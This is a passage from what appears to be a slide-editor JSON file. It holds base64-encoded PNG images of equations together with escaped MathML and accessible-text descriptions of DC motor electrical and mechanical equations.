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\&quot;,\&quot;slideId\&quot;:301,\&quot;accessibleText\&quot;:\&quot;L fraction numerator d i over denominator d t end fraction space plus space R i space equals thin space V minus K omega\&quot;,\&quot;imageHeight\&quot;:23.027027027027028},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;J&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;b&lt;/mi&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mi&gt;V&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;-&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;K&lt;/mi&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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